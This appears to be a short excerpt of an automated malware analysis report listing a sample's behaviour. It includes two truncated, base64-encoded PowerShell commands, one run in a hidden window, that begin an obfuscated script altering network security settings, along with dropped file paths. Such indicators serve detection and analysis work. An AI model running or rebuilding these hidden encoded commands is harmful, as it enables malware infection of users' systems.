Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 852
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\921279.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH... (with hidden window)